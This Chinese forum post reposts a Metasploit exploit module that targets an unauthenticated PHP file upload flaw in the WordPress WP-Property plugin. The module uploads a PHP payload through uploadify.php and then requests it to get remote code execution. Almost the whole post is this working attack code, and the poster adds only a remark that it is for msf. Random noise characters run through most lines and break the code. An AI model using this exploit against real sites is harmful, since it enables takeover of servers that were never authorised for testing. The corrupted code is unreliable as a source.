WordPress WP-Property PHP 文件上传漏洞3 e# Q M2 g4 {% Z
7 J' a2 l( e& R2 Q2 k; w ## # This file is part of the Metasploit Framework and may be subject to
, V7 e4 z0 ?( U5 y4 ~5 X5 z
. ^6 E, k7 ]) a; H5 h# redistribution and commercial restrictions. Please see the Metasploit
9 i6 Y. U* B _' A1 V
% b8 |4 `) w5 E5 u0 o+ l1 m, f# Framework web site for more information on licensing and terms of use.
7 U0 v, s& Z$ Y- m# D3 [- V) x/ v5 L/ b
# http://metasploit.com/framework/ ##
, c$ L% f8 [% Q) W
# a. }( b# @) [& j
) e& [9 E+ E( f; O, b! k, t
1 ~0 Z6 n: f+ r5 C3 ]& G
. Q$ ?, l/ N9 x8 g$ f4 B1 }# F @! Y5 ?5 p: C
require 'msf/core' W( j$ O# N$ k, {2 @* @' O' a
require 'msf/core/exploit/php_exe'
$ ~+ r% ` q: d, S
; Y4 {/ q0 s' {4 B! }% Tclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
& e) q6 d' g! X1 M M'Description' => %q{+ v5 ~! } q$ |* v
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>. y4 s/ m# b7 g: T# U
[
, G- e! r# e' u/ b'Sammy FORGIT', # initial discovery
0 _2 X' _: K" k8 o$ m'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ R$ s+ m& U( F n, L2 y3 f],4 t; @7 ?! J' w/ L) y! z/ h2 f
'License' => MSF_LICENSE,5 o6 M0 n: L4 P, e3 W
'References' =>. v, b* l% G e# s3 h
[
0 |4 i* C" w) h l[ 'OSVDB', '82656' ],
0 j4 b3 U* a7 o$ \- ?% N% a2 F[ 'BID', '53787' ],1 E9 N+ j) ?( \8 d! T) `% `/ @" R
[ 'EDB', '18987'],6 x. j$ [ ]. ~2 K. C% }
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
3 n8 [5 L n: q+ p0 m3 A! p. ]- u],
4 z% {5 y0 L# t# g( X2 u) D& q. j'Payload' =>8 P7 Q2 h5 k6 ^ V% I" J. s
{% {# p% d+ l3 {/ i4 p
'BadChars' => "\x00",
1 g. m; _4 s' W6 u},
- l" b4 K5 k% u$ w" A, W$ |) _- c'Platform' => 'php',; h' m) S" h5 V: o; z
'Arch' => ARCH_PHP,% Y8 y: a0 a3 R! X1 A c
'Targets' =>" l1 \2 {& k+ e( o1 s' `; W# U
[
6 _3 f1 a9 H/ s2 ^/ @! L0 r1 |[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
1 C/ _, X2 ~* K[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ` B! U7 Y' G' s' x" |3 L' @
],2 N9 j: a! e2 s' R$ J2 y. w
'DefaultTarget' => 0,
- u7 o; l& N7 u' b'DisclosureDate' => 'Mar 26 2012'))1 f7 w# G2 k9 J0 p7 Q
8 I e6 B/ m% e% eregister_options(2 K6 j5 ]9 F4 `
[( L4 {- u# r$ i9 ?" k' h( L- i' _' W
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
3 v6 P) \! y7 y% V, \], self.class)
. Z/ i! l: `# \( Y( q; h' |end
6 w+ L9 y- o0 W: z( R5 O, S1 B1 G
/ {* F* c$ k2 I6 r! N) h1 p5 ^def check0 |( R9 D, F$ V! N
uri = target_uri.path- Q. \! Y( S# U/ |
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
# x! }( z9 i5 W: d'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
0 R3 G. J8 U' }( E: ~% z/ S})% l' D! C* u! O( P
2 H1 z; }+ H7 m7 l9 W+ f; s6 F7 j J
if not res or res.code != 200. q. N" J. E$ R4 I2 v
return Exploit::CheckCode::Unknown" u$ u3 E' N, n* _
end
7 J# [+ s% Q- p; |6 \8 c
% K& Q( q" u6 ^5 kreturn Exploit::CheckCode::Appears. ~3 U$ n- W# @' x" j& j) J
end
1 m- L m) t- o1 W S( u% y# f. G
def exploit
1 U& U% b( Z5 Yuri = target_uri.path
$ }: A- P! G7 h G$ [; G/ Euri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)- K- U0 }$ m7 Q4 N1 h6 D0 g- O
2 A& |# y0 w+ p
data = Rex::MIME::Message.new. P8 W% {( {, r7 E0 I
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
4 ^5 f. ?$ J* J3 v" l# v* _6 R" ?data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
4 M! a" f* ?; Q2 [! l! k2 _post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
. C9 m/ V1 b9 r& ^+ p5 j
9 \9 o7 n: g- Z Wprint_status("#{peer} - Uploading payload #{@payload_name}")
( Q: a8 }( ~$ l) Zres = send_request_cgi({
: ?* D9 `1 f& I4 A/ R& B& _$ ['method' => 'POST',2 O' s! }+ y7 \6 A9 K+ y7 w6 ^
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
\* }( l( d$ z3 t W" L'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ g2 n, j1 y+ Y/ @- g'data' => post_data
$ o2 I' s4 w% R})
& s& F" d1 M6 f% L4 v3 n( D# Z4 l$ J: }
2 K7 m4 t6 i4 h- \; W( Wif not res or res.code != 200 or res.body !~ /#{@payload_name}/+ O: @7 ~% _( ^ K
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ r( b7 c( B5 [, [
end D# V) g$ c! u6 h
, l: t) M; L9 w l% ]% e& i9 [upload_uri = res.body' e, ?! h0 E. j& h" f
' i; C0 R$ A! t+ Jprint_status("#{peer} - Executing payload #{@payload_name}")
1 u: b6 U2 v' d8 Nres = send_request_raw({
, y9 D5 F7 r) o* I. X9 v: U+ z: t2 B'uri' => upload_uri,
3 O# t& k; T5 i* x7 e( D'method' => 'GET'' J5 x" l% e* D; `' y3 t; k
})
- A, ?0 ?! s/ o, M( k& E4 t6 nend- J* Z3 Y- r F* K0 P
end) }) N1 ?9 B: m; ?! d
) T. D% G9 s+ ?4 d9 |不要问我这写的是什么 怎么利用 我是说msf.; q6 z/ l7 Q& M% @* H
* ?3 M) S6 P/ @* z& f' R+ ^0 @4 ] |
发表于 2013-1-4 19:51:30
收藏
支持
反对